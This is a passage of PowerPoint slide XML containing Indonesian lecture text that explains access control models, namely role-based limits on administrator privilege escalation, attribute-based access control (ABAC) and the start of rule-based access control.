              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permanen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sewenang-wenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (ABAC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ABAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keanggotaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut-atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch dan antimalware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memonitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprogram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> M-of-N dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemisahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aturan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
